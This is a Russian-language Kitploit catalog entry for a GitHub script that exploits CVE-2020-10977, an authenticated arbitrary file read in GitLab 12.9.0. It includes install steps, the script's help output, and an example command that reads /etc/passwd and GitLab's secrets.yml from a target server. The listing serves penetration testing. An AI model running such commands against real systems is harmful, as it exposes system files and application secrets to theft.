Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
gitlab-12.9.0-file-read — (Претендующий на звание) более качественный скрипт, чем те, что можно найти на exploit-db, для аутентифицированного произвольного чтения файлов в GitLab v12.9.0 (CVE-2020-10977) | Kitploit
Инструменты/GitHubGitHub/erk3/gitlab-12.9.0-file-read
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

(Претендующий на звание) более качественный скрипт, чем те, что можно найти на exploit-db, для аутентифицированного произвольного чтения файлов в GitLab v12.9.0 (CVE-2020-10977)

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Предупреждение

Только для демонстрационных целей и этичного взлома.

Что это

(Претендующий на звание лучшего) скрипт, чем тот, что можно найти на exploit-db, для аутентифицированного произвольного чтения файлов в GitLab v12.9.0 (CVE-2020-10977)

Как использовать

  1. Установите зависимость (остальное у вас, скорее всего, уже есть)

pip3 install requests python-gitlab

  1. Получите API-токен, используя свои учётные данные

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. Профит?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Скачать инструмент